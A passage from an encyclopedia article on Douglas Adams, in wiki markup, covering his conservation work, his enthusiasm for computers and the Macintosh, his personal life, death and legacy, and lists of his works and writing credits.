history|naturalist]] [[Mark Carwardine]] visited rare species such as the [[kakapo]] and [[Chinese river dolphin|baiji]], and the publication of a tie-in book of the same name. In 1992 this was made into a CD-ROM combination of [[audiobook]], [[e-book]] and picture slide show.\n\nAdams and Mark Carwardine contributed the 'Meeting a Gorilla' passage from ''[[Last Chance to See]]'' to the book ''[[Great Ape Project|The Great Ape Project]]''.<ext><name>ref</name><attr/><inner>{{cite book | author=[[Paola Cavalieri|Cavalieri, Paola]] and [[Peter Singer]], editors | title=The Great Ape Project: Equality Beyond Humanity | edition=U.S. Paperback | publisher=St. 
Martin's Griffin | year=1994 | pages=19–23|isbn=0-312-11818-X}}</inner><close></ref></close></ext> This book, edited by [[Paola Cavalieri]] and [[Peter Singer]], launched a wider-scale project in 1993, which calls for the extension of moral equality to include all great apes, human and non-human.\n\nIn 1994 he participated in a climb of [[Mount Kilimanjaro]] while wearing a rhino suit for the British charity organisation ''[[Save the Rhino|Save the Rhino International]]''. Puppeteer [[William Todd-Jones]], who had originally worn the suit in the London Marathon to raise money and bring awareness to the group, also participated in the climb wearing a rhino suit; Adams wore the suit while travelling to the mountain before the climb began. About £100,000 was raised through that event, benefiting schools in [[Kenya]] and a [[black rhinoceros]] preservation programme in [[Tanzania]]. Adams was also an active supporter of the ''[[Dian Fossey]] Gorilla Fund''.\n\nSince 2003, ''Save the Rhino'' has held an annual Douglas Adams Memorial Lecture around the time of his birthday to raise money for environmental campaigns.<ext><name>ref</name><attr/><inner>{{cite web|url=http://lifednah2g2.blogspot.co.uk/2011/01/ninth-douglas-adams-memorial-lecture.html |title=The Ninth Douglas Adams Memorial Lecture |publisher=Save the Rhino International |accessdate=27 July 2011}}</inner><close></ref></close></ext> The lectures in the series are:\n* 2003 [[Richard Dawkins]] – ''Queerer than we can suppose: the strangeness of science''\n* 2004 [[Robert Swan]] – ''Mission Antarctica''\n* 2005 [[Mark Carwardine]] – ''Last Chance to See... 
Just a bit more''\n* 2006 [[Robert Winston]] – ''Is the Human an Endangered Species?''\n* 2007 [[Richard Leakey]] – ''Wildlife Management in East Africa – Is there a future?''\n* 2008 [[Steven Pinker]] – ''The Stuff of Thought, Language as a Window into Human Nature''\n* 2009 [[Benedict Allen]] – ''Unbreakable''\n* 2010 [[Marcus du Sautoy]] – ''42: the answer to life, the universe and prime numbers''\n* 2011 [[Brian Cox (physicist)|Brian Cox]] – ''The Universe and Why We Should Explore It''\n* 2012 Lecture replaced by "Douglas Adams The Party"<ext><name>ref</name><attr/><inner>{{cite web|url=http://www.savetherhino.org/latest_news/news/287_douglas_adams_the_party |title=Douglas Adams The Party |publisher=Save the Rhino International |accessdate=11 March 2013}}</inner><close></ref></close></ext>\n* 2013 [[Adam Rutherford]] – ''Creation: the origin and the future of life''<ext><name>ref</name><attr/><inner>{{cite web|url=http://www.savetherhino.org/events/476_douglas_adams_memorial_lecture_2013 |title=Douglas Adams Memorial Lecture 2013 |publisher=Save the Rhino International |accessdate=15 August 2012}}</inner><close></ref></close></ext>\n* 2014 [[Roger Highfield]] and [[Simon Singh]] – ''The Science of Harry Potter and the Mathematics of The Simpsons''<ext><name>ref</name><attr/><inner>{{cite web|url=http://www.savetherhino.org/events/798_douglas_adams_memorial_lecture |title=Douglas Adams Memorial Lecture 2014 |publisher=Save the Rhino International |accessdate=15 November 2013}}</inner><close></ref></close></ext>\n* 2015 [[Neil Gaiman]] – ''Immortality and Douglas Adams''<ext><name>ref</name><attr/><inner>{{cite web|url=http://www.savetherhino.org/events/1059_douglas_adams_memorial_lecture_2015_-_sold_out |title=Douglas Adams Memorial Lecture 2015 |publisher=Save the Rhino International |accessdate=30 January 2015}}</inner><close></ref></close></ext>\n* 2016 [[Alice Roberts]] – ''Survivors of the Ice Age''<ext><name>ref</name><attr/><inner>{{ cite 
web|url=https://www.savetherhino.org/events/1383_douglas_adams_memorial_lecture_2016|title=Douglas Adams Memorial Lecture 2016 |publisher=Save the Rhino International |accessdate=7 December 2015}}</inner><close></ref></close></ext>\n\n<h level=\"3\" i=\"15\">===Technology and innovation===</h>\nAdams bought his first [[word processor]] in 1982, having considered one as early as 1979. His first purchase was a 'Nexus'. In 1983, when he and Jane Belson went out to Los Angeles, he bought a [[Digital Equipment Corporation|DEC]] [[Rainbow 100|Rainbow]]. Upon their return to England, Adams bought an [[Apricot Computers|Apricot]], then a [[BBC Micro]] and a [[Tandy 1000]].<ext><name>ref</name><attr> name=Simpson_184-185</attr><inner>{{Harvnb|Simpson|2003|pp=184–185}}</inner><close></ref></close></ext> In ''[[Last Chance to See]]'' Adams mentions his [[Cambridge Z88]], which he had taken to [[Zaire]] on a quest to find the [[northern white rhinoceros]].<ext><name>ref</name><attr/><inner>{{cite book|author=Adams, Douglas and [[Mark Carwardine]] | title=Last Chance to See | edition=First U.S. Hardcover | publisher=[[Harmony Books]] | year=1991 | page=59 | isbn=0-517-58215-5}}</inner><close></ref></close></ext>\n\nAdams's posthumously published work, ''[[The Salmon of Doubt]]'', features multiple articles by him on the subject of technology, including reprints of articles that originally ran in ''[[MacUser]]'' magazine, and in ''[[The Independent on Sunday]]'' newspaper. 
In these Adams claims that one of the first computers he ever saw was a [[Commodore PET]], and that he has "adored" his Apple Macintosh ("or rather my family of however many Macintoshes it is that I've recklessly accumulated over the years") since he first saw one at Infocom's offices in Boston in 1984.<ext><name>ref</name><attr/><inner>{{cite book | author=Adams, Douglas | title=The Salmon of Doubt: Hitchhiking the Galaxy One Last Time | edition=First UK hardcover | publisher=Macmillan | year=2002 | pages=90–1 | isbn=0-333-76657-1}}</inner><close></ref></close></ext>\n\nAdams was a Macintosh user from the computer's introduction in 1984 until his death in 2001. He was reportedly the first person to buy a Mac in Europe, with [[Stephen Fry]] the second; some accounts say Fry bought his first, but Fry himself claims he was second to Adams.<ext><name>ref</name><attr/><inner>{{cite web|url=https://www.youtube.com/watch?v=gx6WPQkhUXI |title=Craig Ferguson 23 February, 2010B Late Late show Stephen Fry PT2 |publisher=YouTube |date=21 June 2010 |accessdate=27 July 2011}}</inner><close></ref></close></ext> Adams was also an "[[AppleMasters|Apple Master]]", one of several celebrities whom Apple made into spokespeople for its products (other Apple Masters included [[John Cleese]] and [[Gregory Hines]]). Adams's contributions included a rock video that he created using the first version of [[iMovie]] with footage featuring his daughter Polly. The video was available on Adams's [[.Mac]] homepage. Adams installed and started using the first release of [[Mac OS X]] in the weeks leading up to his death. His very last post to his own forum was in praise of Mac OS X and the possibilities of its [[Cocoa (API)|Cocoa]] programming framework.
He said it was "awesome...", which was also the last word he wrote on his site.<ext><name>ref</name><attr/><inner>{{cite web|url=http://www.douglasadams.com/cgi-bin/mboard/info/dnathread.cgi?2922,1 |title=Adams's final post on his forums at |publisher=Douglasadams.com |accessdate=1 June 2009}}</inner><close></ref></close></ext>\n\nAdams used e-mail extensively long before it reached popular awareness, using it to correspond with [[Steve Meretzky]] during the pair's collaboration on Infocom's version of ''[[The Hitchhiker's Guide to the Galaxy (computer game)|The Hitchhiker's Guide to the Galaxy]]''.<ext><name>ref</name><attr> name="Simpson_184-185"</attr></ext> While living in New Mexico in 1993 he set up another e-mail address and began posting to his own [[USENET]] newsgroup, alt.fan.douglas-adams, and occasionally, when his computer was acting up, to the comp.sys.mac hierarchy.<ext><name>ref</name><attr/><inner>{{cite web|url=https://groups.google.com/group/alt.fan.douglas-adams |title=Discussions – alt.fan.douglas-adams &#124; Google Groups |publisher=Google |accessdate=11 March 2013}}</inner><close></ref></close></ext> Many of his posts are now archived through Google. Challenges to the authenticity of his messages later led Adams to set up a message forum on his own website to avoid the issue. In 1996, Adams was a keynote speaker at The [[Microsoft]] [[Professional Developers Conference]] (PDC) where he described the personal computer as being a modelling device. 
The video of his keynote speech is archived on [[Channel 9 (discussion forum)|Channel 9]].<ext><name>ref</name><attr/><inner>{{cite web |last = Adams |first = Douglas |title = PDC 1996 Keynote with Douglas Adams |work=[[channel9.msdn.com]] |publisher=Channel 9 |date = 15 May 2001 |url = http://channel9.msdn.com/Events/PDC/PDC-1996/PDC-1996-Keynote-with-Douglas-Adams |accessdate =22 March 2013}}</inner><close></ref></close></ext>\nAdams was also a keynote speaker for the April 2001 [[Embedded Systems Conference#ESC Silicon Valley|Embedded Systems Conference]] in San Francisco, one of the major technical conferences on [[embedded system]] engineering. In his keynote speech, he shared his vision of technology and how it should contribute in everyday – and every man's – life.<ext><name>ref</name><attr/><inner>{{cite web |last = Cassel |first = David |title = So long, Douglas Adams, and thanks for all the fun |work=[[Salon (website)|Salon]] |publisher=Salon Media Group |date = 15 May 2001 |url = http://archive.salon.com/tech/feature/2001/05/15/douglas_adams/index.html |accessdate =10 July 2009}}</inner><close></ref></close></ext>\n\n<h level=\"2\" i=\"16\">==Personal life==</h>\nAdams moved to [[Upper Street]], [[Islington]], in 1981<ext><name>ref</name><attr> name="IPP" </attr></ext> and to Duncan Terrace, a few minutes' walk away, in the late 1980s.<ext><name>ref</name><attr> name="IPP" </attr></ext>\n\nIn the early 1980s Adams had an affair with novelist [[Sally Emerson]], who was separated from her husband at that time. Adams later dedicated his book ''[[Life, the Universe and Everything]]'' to Emerson. In 1981 Emerson returned to her husband, [[Peter Stothard]], a contemporary of Adams's at [[Brentwood School (England)|Brentwood School]], and later editor of ''[[The Times]]''. Adams was soon introduced by friends to Jane Belson, with whom he later became romantically involved. 
Belson was the "lady barrister" mentioned in the jacket-flap biography printed in his books during the mid-1980s ("He [Adams] lives in Islington with a lady barrister and an Apple Macintosh"). The two lived in Los Angeles together during 1983 while Adams worked on an early screenplay adaptation of ''Hitchhiker's''. When the deal fell through, they moved back to London, and after several separations ("He is currently not certain where he lives, or with whom")<ext><name>ref</name><attr> name=sfweekly</attr><inner>{{cite web|last=Bowers |first=Keith |title=Big Three |url=http://www.sfweekly.com/2011-07-06/calendar/big-three/ |work=SF Weekly |accessdate=8 December 2011 |archiveurl=http://www.webcitation.org/63mSWp8yr?url=http%3A%2F%2Fwww.sfweekly.com%2F2011-07-06%2Fcalendar%2Fbig-three%2F |archivedate=8 December 2011 |deadurl=no |date=6 July 2011 |df=dmy }}</inner><close></ref></close></ext> and an aborted engagement, they married on 25 November 1991. Adams and Belson had one daughter together, Polly Jane Rocket Adams, born on 22 June 1994, shortly after Adams turned 42. In 1999 the family moved from London to [[Santa Barbara, California]], where they lived until his death. 
Following the funeral, Jane Belson and Polly Adams returned to London.<ext><name>ref</name><attr/><inner>Webb, Chapter 10.</inner><close></ref></close></ext> Jane died on 7 September 2011 of cancer, aged 59.<ext><name>ref</name><attr> name=timesobit</attr><inner>{{cite web|title=Obituary & Guest Book Preview for Jane Elizabeth BELSON|url=http://announcements.thetimes.co.uk/obituaries/timesonline-uk/obituary.aspx?page=lifestory&pid=153521790|work=The Times|accessdate=8 December 2011|archiveurl=http://www.webcitation.org/63mSoMnJe|archivedate=8 December 2011|deadurl=no|date=9 September 2011}}</inner><close></ref></close></ext><ext><name>ref</name><attr> name=h2g2obit</attr><inner>{{cite web|title=Jane Belson, Douglas Adams's widow, passed away|url=http://lifednah2g2.blogspot.com/2011/09/jane-belson-douglas-adams-widow-passed.html|work=h2g2|accessdate=9 July 2013}}</inner><close></ref></close></ext>\n\n<h level=\"2\" i=\"17\">==Death and legacy==</h>\n[[File:Highgate Cemetery - East - Douglas Adams 01.jpg|thumb|Adams's gravestone, [[Highgate Cemetery]], North London]]\nAdams died of a [[heart attack]] on 11 May 2001, aged 49, while resting after his regular workout at a private gym in [[Montecito, California]]. He had unknowingly suffered a gradual narrowing of the [[coronary arteries]], which led at that moment to a [[myocardial infarction]] and a fatal [[cardiac arrhythmia]].<template><title>cn</title><part><name>date</name><equals>=</equals><value>October 2016</value></part></template> Adams had been due to deliver the commencement address at [[Harvey Mudd College]] on 13 May.<ext><name>ref</name><attr/><inner>{{cite web|url=http://www.laweekly.com/2001-05-24/news/lots-of-screamingly-funny-sentences-no-fish/ |title=Lots of Screamingly Funny Sentences. No Fish.
– page 1 |last1=Lewis |first1=Judith |last2=Shulman |first2=Dave |publisher=LA Weekly |date=24 May 2001 |accessdate=20 August 2009 |archiveurl=http://www.webcitation.org/63mQ1aCJQ?url=http%3A%2F%2Fwww.laweekly.com%2F2001-05-24%2Fnews%2Flots-of-screamingly-funny-sentences-no-fish%2F |archivedate=24 May 2001 |deadurl=no |df=dmy }}</inner><close></ref></close></ext> His funeral was held on 16 May in Santa Barbara, California. His remains were subsequently cremated and the ashes placed in [[Highgate Cemetery]] in north London in June 2002.<ext><name>ref</name><attr> name=Simpson_337-338</attr><inner>{{Harvnb|Simpson|2003|pp=337–338}}</inner><close></ref></close></ext>\n\nA memorial service was held on 17 September 2001 at [[St Martin-in-the-Fields]] church, [[Trafalgar Square]], London. This became the first church service broadcast live on the web by the BBC.<ext><name>ref</name><attr/><inner>Gaiman, 204.</inner><close></ref></close></ext> Video clips of the service are still available on the BBC's website for download.<ext><name>ref</name><attr/><inner>{{cite web|url=http://www.bbc.co.uk/cult/hitchhikers/celebration/ |title=BBC Online – Cult – Hitchhiker's – Douglas Adams – Service of Celebration |publisher=BBC |date=17 September 2001 |accessdate=11 March 2013}}</inner><close></ref></close></ext>\n\nOne of his last public appearances was a talk given at the University of California, Santa Barbara, ''Parrots, the universe and everything'', recorded days before his death.<ext><name>ref</name><attr/><inner>{{cite web|url=https://www.youtube.com/watch?v=_ZG8HBuDjgc |title=Parrots, the universe and everything, recorded May 2001 |publisher=YouTube |accessdate=11 March 2013}}</inner><close></ref></close></ext> A full transcript of the talk is available, and the university has made the full video available on [https://www.youtube.com/watch?v=_ZG8HBuDjgc YouTube].<ext><name>ref</name><attr/><inner>{{cite web|url=http://navarroj.com/parrots |title=Transcript of "Parrots, the 
Universe and Everything" |publisher=Navarroj.com |accessdate=27 July 2011}}</inner><close></ref></close></ext>\n\nThe [[Minor Planet Center]] named an asteroid [[18610 Arthurdent]] after the ''Hitchhiker's'' protagonist, coincidentally announcing the name two days before Adams died.<ext><name>ref</name><attr> name=MPC42677</attr><inner>{{Citation | publication-date = 9 May 2001 | title = New Names of Minor Planets | periodical = [[Minor Planet Circular]] | publication-place = Cambridge, Mass | publisher=[[Minor Planet Center]] | issue = MPC 42677 | url = http://www.minorplanetcenter.net/iau/ECS/MPCArchive/2001/MPC_20010509.pdf | issn = 0736-6884 }}</inner><close></ref></close></ext> There is also an [[25924 Douglasadams|asteroid named after Adams himself]].<ext><name>ref</name><attr/><inner>[http://www.msnbc.msn.com/id/6867061/ Asteroid named after 'Hitchhiker' humorist: Late British sci-fi author honored after cosmic campaign] by Alan Boyle, MSNBC, 25 January 2005</inner><close></ref></close></ext>\n\nIn May 2002 ''[[The Salmon of Doubt]]'' was published, containing many short stories, essays, and letters, as well as eulogies from [[Richard Dawkins]], [[Stephen Fry]] (in the UK edition), [[Christopher Cerf]] (in the US edition), and [[Terry Jones]] (in the US paperback edition).
It also includes eleven chapters of his long-awaited but unfinished novel, ''The Salmon of Doubt'', which was originally intended to become a new [[Dirk Gently]] novel, but might have later become the sixth ''Hitchhiker'' novel.<ext><name>ref</name><attr/><inner>\n{{cite news\n|url=http://www.independent.co.uk/arts-entertainment/books/reviews/the-salmon-of-doubt-by-douglas-adams-650803.html\n|title=The Salmon of Doubt by Douglas Adams\n|work=The Independent |location=London\n|accessdate=2 August 2009\n|last=Murray\n|first=Charles Shaar\n| date=10 May 2002\n}}\n</inner><close></ref></close></ext><ext><name>ref</name><attr/><inner>\n{{cite news\n|url=http://www.independent.co.uk/arts-entertainment/books/features/cover-stories-douglas-adams-narnia-chronicles-something-like-a-house-672250.html\n|title=Cover Stories: Douglas Adams, Narnia Chronicles, Something like a House\n|work=The Independent |location=London\n|accessdate=2 August 2009\n|author=The Literator\n| date=5 January 2002|archiveurl=https://web.archive.org/web/20090801062359/http://www.independent.co.uk/arts-entertainment/books/features/cover-stories-douglas-adams-narnia-chronicles-something-like-a-house-672250.html|archivedate=1 August 2009 }}\n</inner><close></ref></close></ext>\n\nOther events after Adams's death included a [[webcast]] production of ''[[Shada]]'', allowing the complete story to be told, radio dramatisations of the final three books in the ''Hitchhiker's'' series, and the completion of [[The Hitchhiker's Guide to the Galaxy (film)|the film adaptation]] of ''[[The Hitchhiker's Guide to the Galaxy (book)|The Hitchhiker's Guide to the Galaxy]]''. 
The film, released in 2005, posthumously credits Adams as a producer, and several art design elements – including a head-shaped planet seen near the end of the film – incorporated Adams's features.\n\nA 12-part radio series based on the [[Dirk Gently]] novels was announced in 2007, with annual transmissions starting in October.<ext><name>ref</name><attr/><inner>{{cite web |url=http://www.dirkmaggs.dswilliams.co.uk/Dirk%20Maggs%20News%20%20new%20projects.htm |title=Dirk Maggs News and New Projects page }}{{dead link|date=June 2016|bot=medic}}{{cbignore|bot=medic}}</inner><close></ref></close></ext>\n\nBBC Radio 4 also commissioned a third Dirk Gently radio series based on the incomplete chapters of ''The Salmon of Doubt'', and written by [[Kim Fuller]];<ext><name>ref</name><attr/><inner>{{cite web|author=Matthew Hemley |url=http://www.thestage.co.uk/news/newsstory.php/24312/douglas-adams-final-dirk-gently-novel-to-be |title=The Stage / News / Douglas Adams's final Dirk Gently novel to be adapted for Radio 4 |work=The Stage |date=5 May 2009 |accessdate=20 August 2009}}</inner><close></ref></close></ext> but this was dropped in favour of a BBC TV series based on the two completed novels.<ext><name>ref</name><attr/><inner>{{cite web|url=http://www.chortle.co.uk/news/2009/10/11/9767/bbc_plans_dirk_gently_tv_series|title=BBC plans Dirk Gently TV series|publisher=Chortle.co.uk|date=11 October 2009|accessdate=11 October 2009}}</inner><close></ref></close></ext> A sixth ''Hitchhiker'' novel, ''[[And Another Thing... (novel)|And Another Thing...]]'', by ''[[Artemis Fowl (series)|Artemis Fowl]]'' author [[Eoin Colfer]], was released on 12 October 2009 (the 30th anniversary of the first book), published with the full support of Adams's estate. 
A [[BBC Radio 4]] ''[[Book at Bedtime]]'' adaptation and an audio book soon followed.\n\nOn 25 May 2001, two weeks after Adams's death, his fans organised a tribute known as [[Towel Day]], which has been observed every year since then.\n\nIn 2011, over 3,000 people took part in a public vote to choose the subjects of [[Blue plaque|People's Plaques]] in Islington;<ext><name>ref</name><attr> name="IPP"</attr><inner>{{cite web|url=http://www.islington.gov.uk/Leisure/heritage/heritage_borough/bor_plaques/peoplesplaques.asp |title=Islington People's Plaques |date=25 July 2011 |accessdate=13 August 2011 |deadurl=yes |archiveurl=https://web.archive.org/web/20120318001614/http://www.islington.gov.uk/Leisure/heritage/heritage_borough/bor_plaques/peoplesplaques.asp |archivedate=18 March 2012 }}</inner><close></ref></close></ext> Adams received 489 votes.\n\nOn 11 March 2013, Adams's 61st birthday was celebrated with an interactive [[Google Doodle]].<ext><name>ref</name><attr> name=GoogleDoodle2013a</attr><inner>{{cite news|title=Don't Panic! Google Doodle Honors Author Douglas Adams|url=http://abcnews.go.com/blogs/technology/2013/03/dont-panic-google-doodle-honors-author-douglas-adams/|accessdate=11 March 2013|newspaper=abc News|date=11 March 2013}}</inner><close></ref></close></ext><ext><name>ref</name><attr/><inner>{{cite web|title=Douglas Adams' 61st Birthday|url=http://www.google.com/doodles/douglas-adams-61st-birthday|accessdate=11 March 2013}}</inner><close></ref></close></ext>\n\n<h level=\"2\" i=\"18\">==Awards and nominations==</h>\n{| class="wikitable" style="font-size:90%"\n|- style="text-align:center;"\n! style="background:#B0C4DE;" | Year\n! style="background:#B0C4DE;" | Award\n! style="background:#B0C4DE;" | Work\n! style="background:#B0C4DE;" | Category\n! style="background:#B0C4DE;" | Result\n! 
style="background:#B0C4DE;" | Reference\n|-\n|1979\n|[[Hugo Award]]\n|''[[The Hitchhiker's Guide to the Galaxy (radio series)|The Hitchhiker's Guide to the Galaxy]]'' <small>(shared with [[Geoffrey Perkins]])</small>\n|[[Hugo Award for Best Dramatic Presentation|Best Dramatic Presentation]]\n|<template><title>nom</title></template>\n|\n|}\n\n<h level=\"2\" i=\"19\">==Works==</h>\n<template lineStart=\"1\"><title>Refbegin</title><part><name index=\"1\"/><value>20em</value></part></template>\n* ''[[The Private Life of Genghis Khan]]'' (1975), based on a comedy sketch Adams co-wrote with [[Graham Chapman]] (short story)\n* ''[[The Hitchhiker's Guide to the Galaxy (radio series)|The Hitchhiker's Guide to the Galaxy]]'' (1978) (radio series)\n* ''[[The Hitchhiker's Guide to the Galaxy (book)|The Hitchhiker's Guide to the Galaxy]]'' (1979) (novel)\n* ''[[Shada]]'' (1979–1980), a Doctor Who serial\n* ''[[The Restaurant at the End of the Universe]]'' (1980) (novel)\n* ''[[Life, the Universe and Everything]]'' (1982) (novel)\n* ''[[The Meaning of Liff]]'' (1983, with [[John Lloyd (producer)|John Lloyd]]) (book)\n* ''[[So Long, and Thanks for All the Fish]]'' (1984) (novel)\n* ''[[The Hitchhiker's Guide to the Galaxy (computer game)|The Hitchhiker's Guide to the Galaxy]]'' (1984, with [[Steve Meretzky]]) (computer game)\n* ''[[The Hitchhiker's Guide to the Galaxy: The Original Radio Scripts]]'' (1985, with [[Geoffrey Perkins]])\n* ''[[Young Zaphod Plays It Safe]]'' (1986) (short story)\n* ''[[A Christmas Fairly Story]]'' <template><title>sic</title></template> (1986, with [[Terry Jones]]), and\n* ''Supplement to The Meaning of Liff'' (1986, with [[John Lloyd (producer)|John Lloyd]] and [[Stephen Fry]]), both part of\n** ''[[The Utterly Utterly Merry Comic Relief Christmas Book]]'' (1986, edited with [[Peter Fincham]])\n* ''[[Bureaucracy (computer game)|Bureaucracy]]'' (1987) (computer game)\n* ''[[Dirk Gently's Holistic Detective Agency]]'' (1987) (novel)\n* ''[[The Long Dark
Tea-Time of the Soul]]'' (1988) (novel)\n* ''[[The Deeper Meaning of Liff]]'' (1990, with [[John Lloyd (producer)|John Lloyd]])\n* ''[[Last Chance to See]]'' (1990, with [[Mark Carwardine]]) (book)\n* ''[[Mostly Harmless]]'' (1992) (novel)\n* ''[[The Hitchhiker's Guide to the Galaxy (book)#Illustrated edition|The Illustrated Hitchhiker's Guide to the Galaxy]]'' (1994)\n* ''[[Douglas Adams's Starship Titanic]]'' (1997), written by [[Terry Jones]], based on an idea by Adams\n* ''[[Starship Titanic]]'' (computer game) (1998)\n* ''[[h2g2]]'' (internet project) (1999)\n* ''The Internet: The Last Battleground of the 20th century'' (radio series) (2000)\n* ''[[The Hitchhiker's Guide to the Future]]'' (radio series) (2001) final project for [[BBC Radio 4]] before his death\n* ''[https://www.youtube.com/watch?v=_ZG8HBuDjgc Parrots, the universe and everything]'' (2001)\n* ''[[The Salmon of Doubt]]'' (2002), unfinished novel manuscript (11 chapters), short stories, essays, and interviews (also available as an audiobook, read by [[Simon Jones (actor)|Simon Jones]])\n* ''[[The Hitchhiker's Guide to the Galaxy (film)|The Hitchhiker's Guide to the Galaxy]]'' (2005) (film)\n<template lineStart=\"1\"><title>Refend</title></template>\n\n<h level=\"2\" i=\"20\">==Writing credits==</h>\n{| class="wikitable"\n|- style="background:#ccc; text-align:center;"\n! Production\n! Notes\n! Broadcaster\n|-\n|''[[Monty Python's Flying Circus]]''\n|\n*"[[List of Monty Python's Flying Circus episodes#6. 
Party Political Broadcast|Party Political Broadcast on Behalf of the Liberal Party]]" (1974)\n|[[BBC Two]]\n|-\n|''[[Out of the Trees]]''\n|\n*Television pilot (1976)\n|BBC Two\n|-\n|''[[Doctor on the Go]]''\n|\n*"For Your Own Good" (1977)\n|[[ITV (TV network)|ITV]]\n|-\n|''[[Doctor Who]]''\n|\n5 episodes (1978-1979, 1983): \n*"[[The Pirate Planet]]" (1978)\n*"[[Destiny of the Daleks]]" (1979) (uncredited)\n*"[[City of Death]]" (co-written with [[Graham Williams (television producer)|Graham Williams]], 1979)\n*"[[The Five Doctors]]" (1983) ([[Shada]] segments; uncredited)\n|[[BBC One]]\n|-\n|''[[Doctor Snuggles]]''\n|\n*"The Great Disappearing Mystery" (1979)\n*"The Remarkable Fidgety River" (1979)\n|ITV\n|-\n|''[[Not the Nine O'Clock News]]''\n|\n*Unknown episodes (1979)\n|BBC Two\n|-\n|''[[The Hitchhiker's Guide to the Galaxy (TV series)|The Hitchhiker's Guide to the Galaxy]]''\n|\n*6 episodes (1981)\n|BBC Two\n|-\n|''[[Hyperland]]''\n|\n*Television documentary (1990)\n|BBC Two\n|}\n\n<h level=\"2\" i=\"21\">==Notes==</h>\n<template lineStart=\"1\"><title>reflist</title><part><name index=\"1\"/><value>30em</value></part></template>\n\n<h level=\"2\" i=\"22\">==References==</h>\n* Adams, Douglas (1998). 
[http://www.biota.org/people/douglasadams/ Is there an Artificial God?], speech at ''Digital Biota 2'', Cambridge, England, September 1998.\n* <template><title>cite book</title><part><name>last</name><equals>=</equals><value>Adams</value></part><part><name>first</name><equals>=</equals><value>Douglas</value></part><part><name>title</name><equals>=</equals><value>The Salmon of Doubt: Hitchhiking the Galaxy One Last Time</value></part><part><name>year</name><equals>=</equals><value>2002</value></part><part><name>publisher</name><equals>=</equals><value>Macmillan</value></part><part><name>location</name><equals>=</equals><value>London</value></part><part><name>isbn</name><equals>=</equals><value>0-333-76657-1</value></part><part><name>ref</name><equals>=</equals><value>harv</value></part></template>\n* Dawkins, Richard (2003). "Eulogy for Douglas Adams," in ''A devil's chaplain: reflections on hope, lies, science, and love''. Houghton Mifflin Harcourt.\n* Felch, Laura (2004). [http://www.bookslut.com/nonfiction/2004_05_002057.php Don't Panic: Douglas Adams and the Hitchhiker's Guide to the Galaxy by Neil Gaiman], May 2004\n* Ray, Mohit K (2007). ''Atlantic Companion to Literature in English'', Atlantic Publishers and Distributors. ISBN 81-269-0832-7\n* <template><title>cite book</title><part><name>last</name><equals>=</equals><value>Simpson</value></part><part><name>first</name><equals>=</equals><value>M. 
J.</value></part><part><name>title</name><equals>=</equals><value>[[Hitchhiker: A Biography of Douglas Adams]]</value></part><part><name>year</name><equals>=</equals><value>2003</value></part><part><name>publisher</name><equals>=</equals><value>Justin, Charles & Co</value></part><part><name>location</name><equals>=</equals><value>Boston, Mass.</value></part><part><name>isbn</name><equals>=</equals><value>1-932112-17-0</value></part><part><name>edition</name><equals>=</equals><value>1st</value></part><part><name>ref</name><equals>=</equals><value>harv</value></part></template>\n* Webb, Nick (2005a). ''Wish You Were Here: The Official Biography of Douglas Adams''. Ballantine Books. ISBN 0-345-47650-6\n* Webb, Nick (2005b). [http://www.oxforddnb.com/view/article/75853 "Adams, Douglas Noël (1952–2001)"], ''Oxford Dictionary of National Biography'', Oxford University Press, January 2005. Retrieved 25 October 2005.\n\n<h level=\"2\" i=\"23\">==Further reading==</h>\n<h level=\"3\" i=\"24\">===Articles===</h>\n<template lineStart=\"1\"><title>Refbegin</title><part><name index=\"1\"/><value>30em</value></part></template>\n* Herbert, R. (1980). The Hitchhiker's Guide to the Galaxy (Book Review). Library Journal, 105(16), 1982.\n* Adams, J., & Brown, R. (1981). The Hitchhiker's Guide to the Galaxy (Book Review). School Library Journal, 27(5), 74.\n* Nickerson, S. L. (1982). The Restaurant at the End of the Universe (Book). Library Journal, 107(4), 476.\n* Nickerson, S. L. (1982). Life, the Universe, and Everything (Book). Library Journal, 107(18), 2007.\n* Morner, C. (1982). The Restaurant at the End of the Universe (Book Review). School Library Journal, 28(8), 87.\n* Morner, C. (1983). Life, the Universe and Everything (Book Review). School Library Journal, 29(6), 93.\n* Shorb, B. (1985). So Long, and Thanks for All the Fish (Book). School Library Journal, 31(6), 90.\n* The Long Dark Tea-Time of the Soul (Book). (1989). 
Atlantic (02769077), 263(4), 99.\n* Hoffert, B., & Quinn, J. (1990). Last Chance To See (Book). Library Journal, 115(16), 77.\n* Reed, S. S., & Cook, I. I. (1991). Dances with kakapos. People, 35(19), 79.\n* Last Chance to See (Book). (1991). Science News, 139(8), 126.\n* Field, M. M., & Steinberg, S. S. (1991). Douglas Adams. Publishers Weekly, 238(6), 62.\n* Dieter, W. (1991). Last Chance to See (Book). Smithsonian, 22(3), 140.\n* Dykhuis, R. (1991). Last Chance To See (Book). Library Journal, 116(1), 140.\n* Beatty, J. (1991). Good Show (Book). Atlantic (02769077), 267(3), 131.\n* A guide to the future. (1992). Maclean's, 106(44), 51.\n* Zinsser, J. (1993). Audio reviews: Fiction. Publishers Weekly, 240(9), 24.\n* Taylor, B., & Annichiarico, M. (1993). Audio reviews. Library Journal, 118(2), 132.\n* Good reads. (1995). NetGuide, 2(4), 109.\n* Stone, B. (1998). The unsinkable starship. Newsweek, 131(15), 78.\n* Gaslin, G. (2001). Galaxy Quest. Entertainment Weekly, (599), 79.\n* So long, and thanks for all the fish. (2001). Economist, 359(8222), 79.\n* Geier, T., & Raftery, B. M. (2001). Legacy. Entertainment Weekly, (597), 11.\n* Passages. (2001). Maclean's, 114(21), 13.\n* Don't panic! Douglas Adams to keynote Embedded show. (2001). Embedded Systems Programming, 14(3), 10.\n* Ehrenman, G. (2001). World Wide Weird. InternetWeek, (862), 15.\n* Zaleski, J. (2002). The Salmon of Doubt (Book). Publishers Weekly, 249(15), 43.\n* Mort, J. (2002). The Salmon of Doubt (Book). Booklist, 98(16), 1386.\n* Lewis, D. L. (2002). Last Time Round The Galaxy. Quadrant Magazine, 46(9), 84.\n* Burns, A. (2002). The Salmon of Doubt (Book). Library Journal, 127(15), 111.\n* Burns, A., & Rhodes, B. (2002). The Restaurant at the End of the Universe (Book). Library Journal, 127(19), 118.\n* Kaveney, R. (2002). A cheerful whale. TLS, (5173), 23.\n* Pearl, N., & Welch, R. (2003). The Hitchhiker's Guide To The Galaxy (Book). 
